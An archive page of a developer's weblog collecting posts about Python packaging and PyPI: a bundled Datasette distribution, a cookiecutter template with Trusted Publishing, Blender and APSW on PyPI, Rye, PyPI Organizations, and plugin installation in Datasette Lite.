Tags: javascript, open-source, pypi, d3, jupyter, observable, mike-bostock, observable-framework, observable-plot

datasette-studio

2024-02-18T20:38:08+00:00

datasette-studio

I've been thinking for a while that it might be interesting to have a version of Datasette that comes bundled with a set of useful plugins, aimed at expanding Datasette's default functionality to cover things like importing data and editing schemas.

This morning I built the very first experimental preview of what that could look like. Install it using pipx:

pipx install datasette-studio

I recommend pipx because it will ensure datasette-studio gets its own isolated environment, independent of any other Datasette installations you might have.

Now running datasette-studio instead of datasette will get you the version with the bundled plugins.

The implementation of this is fun - it's a single pyproject.toml file defining the dependencies and setting up the datasette-studio CLI hook, which is enough to provide the full set of functionality.

Is this a good idea? I don't know yet, but it's certainly an interesting initial experiment.

Tags: cli, plugins, projects, pypi, python, datasette

Publish Python packages to PyPI with a python-lib cookiecutter template and GitHub Actions

2024-01-16T21:59:56+00:00

I use cookiecutter to start almost all of my Python projects. It helps me quickly generate a skeleton of a project with my preferred directory structure and configured tools.

I made some major upgrades to my python-lib cookiecutter template today. Here's what it can now do to help you get started with a new Python library:

Create a pyproject.toml file configured for use with setuptools. In my opinion this is the pattern with the current lowest learning curve - I wrote about that in detail in this TIL.
Add a skeleton README and an Apache 2.0 LICENSE file.
Create your_package/__init__.py for your code to go in.
Create tests/test_your_package.py with a skeleton test.
Include pytest as a test dependency.
Configure GitHub Actions with two workflows in .github/workflows - one for running the tests against Python 3.8 through 3.12, and one for publishing releases of your package to PyPI.

The changes I made today are that I switched from setup.py to pyproject.toml, and I made a big improvement to how the publishing workflow authenticates with PyPI.

Publishing to PyPI with Trusted Publishing

My previous version of this template required you to jump through quite a few hoops to get PyPI publishing to work. You needed to create a PyPI token that could publish a new package, then paste that token into a GitHub Actions secret, then publish the package, and then disable that token and create a new one dedicated to just updating this package in the future.

The new version is much simpler, thanks to PyPI's relatively new Trusted Publishers mechanism.

To publish a new package, you need to sign into PyPI and create a new "pending publisher". Effectively you tell PyPI "My GitHub repository myname/name-of-repo should be allowed to publish packages with the name name-of-package".

Here's that form for my brand new datasette-test library, the first library I published using this updated template:

Then create a release on GitHub, with a name that matches the version number from your pyproject.toml. Everything else should Just Work.

I wrote more about Trusted Publishing in this TIL.

Creating a package using a GitHub repository template

The most time consuming part of this project was getting my GitHub repository template to work properly.

There are two ways to use my cookiecutter template. You can use the cookiecutter command-line tool like this:

pipx install cookiecutter
cookiecutter gh:simonw/python-lib
# Answer a few questions here

But a more fun and convenient option is to use my GitHub repository template, simonw/python-lib-template-repository.

This lets you fill in a form on GitHub to create a new repository which will then execute the cookiecutter template for you and update itself with the result.

You can see an example of a repository created using this template at datasette/datasette-test.

Adding it all together

There are quite a lot of moving parts under the scenes here, but the end result is that anyone can now create a Python library with test coverage, GitHub CI and release automation by filling in a couple of forms and clicking some buttons.

For more details on how this all works, and how it's evolved over time:

A cookiecutter template for writing Datasette plugins from June 2020 describes my first experiments with cookiecutter
Dynamic content for GitHub repository templates using cookiecutter and GitHub Actions from August 2021 describes my earliest attempts at using GitHub repository templates for this
How to build, test and publish an open source Python library is a ten minute talk I gave at PyGotham in November 2021. It describes setup.py in detail, which is no longer my preferred approach.

Tags: github, projects, pypi, python, github-actions, cookiecutter

bpy - Blender on PyPI

2023-09-08T15:29:10+00:00

bpy - Blender on PyPI

TIL you can “pip install” Blender!

bpy “provides Blender as a Python module”—it’s part of the official Blender project, and ships with binary wheels ranging in size from 168MB to 319MB depending on your platform.

It only supports the version of Python used by the current Blender release though—right now that’s Python 3.10.

Via @kolibril13

Tags: pypi, python, blender

Rye

2023-04-24T04:02:42+00:00

Rye

Armin Ronacher's take on a Python packaging tool. There are a lot of interesting ideas in this one - it's written in Rust, configured using pyproject.toml and has some very strong opinions, including completely hiding pip from view and insisting you use rye add package instead. Notably, it doesn't use the system Python at all: instead, it downloads a pre-compiled standalone Python from Gregory Szorc's python-build-standalone project - the same approach I used for the Datasette Desktop Electron app.

Armin warns that this is just an exploration, with no guarantees of future maintenance - and even has an issue open titled Should Rye exist?

Tags: armin-ronacher, packaging, pypi, python, rust, rye

Introducing PyPI Organizations

2023-04-23T20:29:39+00:00

Introducing PyPI Organizations

Launched at PyCon US today: Organizations allow packages on the Python Package Index to be owned by a group, not an individual user account. “We’re making organizations available to community projects for free, forever, and to corporate projects for a small fee.”—this is the first revenue generating PyPI feature.

Tags: open-source, packaging, pypi, python, psf

APSW is now available on PyPI

2022-09-15T22:18:04+00:00

APSW is now available on PyPI

News I missed from June: the venerable (17+ years old) APSW SQLite library for Python is now officially available on PyPI as a set of wheels, built using cibuildwheel. This is a really big deal: APSW is an extremely well maintained library which exposes way more low-level SQLite functionality than the standard library’s sqlite3 module, and to-date one of the only disadvantages of using it was the need to install it independently of PyPI. Now you can just run “pip install apsw”.

Tags: pypi, python, sqlite, apsw

Should You Use Upper Bound Version Constraints?

2022-09-05T17:42:02+00:00

Should You Use Upper Bound Version Constraints?

Should you pin your library's dependencies using "click>=7,<8" or "click~=7.0"? Henry Schreiner's short answer is no, and his long answer is an exhaustive essay covering every conceivable aspect of this thorny Python packaging problem.

Via @AdamChainz

Tags: packaging, pypi, python

Plugin support for Datasette Lite

2022-08-17T18:20:59+00:00

I've added a new feature to Datasette Lite, my distribution of Datasette that runs entirely in the browser using Python and SQLite compiled to WebAssembly. You can now install additional Datasette plugins by passing them in the URL.

Datasette Lite background

Datasette Lite runs Datasette in the browser. I initially built it as a fun technical proof of concept, but I'm increasingly finding it to be a genuinely useful tool for quick ad-hoc data analysis and publication. Not having any server-side components at all makes it effectively free to use without fear of racking up cloud computing costs for a throwaway project.

You can read more about Datasette Lite in these posts:

Datasette Lite: a server-side Python web application running in a browser
Joining CSV files in your browser using Datasette Lite
Scraping data into Datasette Lite shows an example project where I scraped PSF board resolutions, stored the results in a CSV file in a GitHub Gist and then constructed this URL to open the result in Datasette Lite and execute a SQL query.

Adding plugins to Datasette Lite

One of Datasette's key features is support for plugins. There are over 90 listed in the plugin directory now, with more emerging all the time. They're a fantastic way to explore new feature ideas and extend the software to handle non-default use cases.

Plugins are Python packages, published to PyPI. You can add them to Datasette Lite using the new ?install=name-of-plugin query string parameter.

Here's an example URL that loads the datasette-jellyfish plugin, which adds new SQL functions for calculating distances between strings, then executes a SQL query that demonstrates that plugin:

https://lite.datasette.io/?install=datasette-jellyfish#/fixtures?sql=SELECT%0A++++levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++damerau_levenshtein_distance%28%3As1%2C+%3As2%29%2C%0A++++hamming_distance%28%3As1%2C+%3As2%29%2C%0A++++jaro_similarity%28%3As1%2C+%3As2%29%2C%0A++++jaro_winkler_similarity%28%3As1%2C+%3As2%29%2C%0A++++match_rating_comparison%28%3As1%2C+%3As2%29%3B&s1=barrack+obama&s2=barrack+h+obama

That URL uses ?install=datasette-jellyfish to install the plugin, then executes the following SQL query:

SELECT
    levenshtein_distance(:s1, :s2),
    damerau_levenshtein_distance(:s1, :s2),
    hamming_distance(:s1, :s2),
    jaro_similarity(:s1, :s2),
    jaro_winkler_similarity(:s1, :s2),
    match_rating_comparison(:s1, :s2);

It sets s1 to "barack obama" and s2 to "barrack h obama".

Plugin compatibility

Unfortunately, many existing Datasette plugins aren't yet compatible with Datasette Lite. Most importantly, visualization plugins such as datasette-cluster-map and datasette-vega don't work.

This is because I haven't yet solved the challenge of loading additional JavaScript and CSS into Datasette Lite - see issue #8.

Here's the full list of plugins that I've confirmed work with Datasette Lite so far:

datasette-packages - Show a list of currently installed Python packages - demo
datasette-dateutil - dateutil functions for Datasette - demo
datasette-schema-versions - Datasette plugin that shows the schema version of every attached database - demo
datasette-debug-asgi - Datasette plugin for dumping out the ASGI scope. - demo
datasette-query-links - Turn SELECT queries returned by a query into links to execute them - demo
datasette-json-html - Datasette plugin for rendering HTML based on JSON values - demo
datasette-haversine - Datasette plugin that adds a custom SQL function for haversine distances - demo
datasette-jellyfish - Datasette plugin that adds custom SQL functions for fuzzy string matching, built on top of the Jellyfish Python library - demo
datasette-pretty-json - Datasette plugin that pretty-prints any column values that are valid JSON objects or arrays. - demo
datasette-yaml - Export Datasette records as YAML - demo
datasette-copyable - Datasette plugin for outputting tables in formats suitable for copy and paste - demo

How it works

The implementation is pretty simple - it can be seen in this commit. The short version is that ?install= options are passed through to the Python web worker that powers Datasette Lite, which then runs the following:

for install_url in install_urls:
    await micropip.install(install_url)

micropip is a component of Pyodide which knows how to install pure Python wheels directly from PyPI into the browser's emulated Python environment. If you open up the browser devtools networking panel you can see that in action!

Since the ?install= parameter is being passed directly to micropip.install() you don't even need to provide names of packages hosted on PyPI - you could instead provide the URL to a wheel file that you're hosting elsewhere.

This means you can use ?install= as a code injection attack - you can install any Python code you want into the environent. I think that's fine - the only person who will be affected by this is the user who is viewing the page, and the lite.datasette.io domain deliberately doesn't have any cookies set that could cause problems if someone were to steal them in some way.

Tags: plugins, projects, pypi, datasette, webassembly, pyodide, datasette-lite, cors

Simon Willison's Weblog: pypi

My minute-by-minute response to the LiteLLM malware attack

LiteLLM Hack: Were You One of the 47,000?

Package Managers Need to Cool Down

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer

Distributing Go binaries like sqlite-scanner through PyPI using go-to-wheel

sqlite-scanner

How the Python package works

Which means we can use it as a dependency

Building Python wheels from Go packages with go-to-wheel

I expect to use this pattern a lot

ChatGPT Containers can now run bash, pip/npm install packages, and download files

container.download

What it does

Signature (inputs)

Is container.download a data exfiltration vulnerability?

Bash and other languages

Installing packages from pip and npm

Adding it all together

Update: a full list of tools

python

python.exec (FREEFORM) → any

web

web.run (ToolCallV5 JSON) → any

automations

automations.create → any

automations.update → any

automations.list → any

guardian_tool

guardian_tool.get_policy → str

file_search

file_search.msearch → any

file_search.mclick → any

gmail (read-only)

gmail.search_email_ids → any

gmail.batch_read_email → any

gcal (read-only)

gcal.search_events → any

gcal.read_event → any

gcontacts (read-only)

gcontacts.search_contacts → any

canmore (canvas)

canmore.create_textdoc → any

canmore.update_textdoc → any

canmore.comment_textdoc → any

python_user_visible

python_user_visible.exec (FREEFORM) → any

user_info

user_info.get_user_info → any

summary_reader

summary_reader.read → any

container

container.exec → any

container.feed_chars → any

container.open_image → any

container.download → any

bio (memory)

bio.update (FREEFORM) → any

api_tool

api_tool.list_resources → any

api_tool.call_tool → any

personal_context

personal_context.search → any

image_gen

image_gen.text2im → any

user_settings

user_settings.get_user_settings → any

user_settings.set_setting → any

artifact_handoff

artifact_handoff.prepare_artifact_generation → any

PyPI: Preventing Domain Resurrection Attacks

Introducing OSS Rebuild: Open Source, Rebuilt to Last

crates.io: Trusted Publishing

My First Open Source AI Generated Library

astral-sh/ty

Making PyPI's test suite 81% faster

Using pip to install a Large Language Model that's under 100MB

Finding a tiny model

Building the plugin

Packaging the plugin

`python.exec` (FREEFORM) → any

`web.run` (ToolCallV5 JSON) → any

`automations.create` → any

`automations.update` → any

`automations.list` → any

`guardian_tool.get_policy` → str

`file_search.msearch` → any

`file_search.mclick` → any

`gmail.search_email_ids` → any

`gmail.batch_read_email` → any

`gcal.search_events` → any

`gcal.read_event` → any

`gcontacts.search_contacts` → any

`canmore.create_textdoc` → any

`canmore.update_textdoc` → any

`canmore.comment_textdoc` → any

`python_user_visible.exec` (FREEFORM) → any

`user_info.get_user_info` → any

`summary_reader.read` → any

`container.exec` → any

`container.feed_chars` → any

`container.open_image` → any

`container.download` → any

`bio.update` (FREEFORM) → any

`api_tool.list_resources` → any

`api_tool.call_tool` → any

`personal_context.search` → any

`image_gen.text2im` → any

`user_settings.get_user_settings` → any

`user_settings.set_setting` → any

`artifact_handoff.prepare_artifact_generation` → any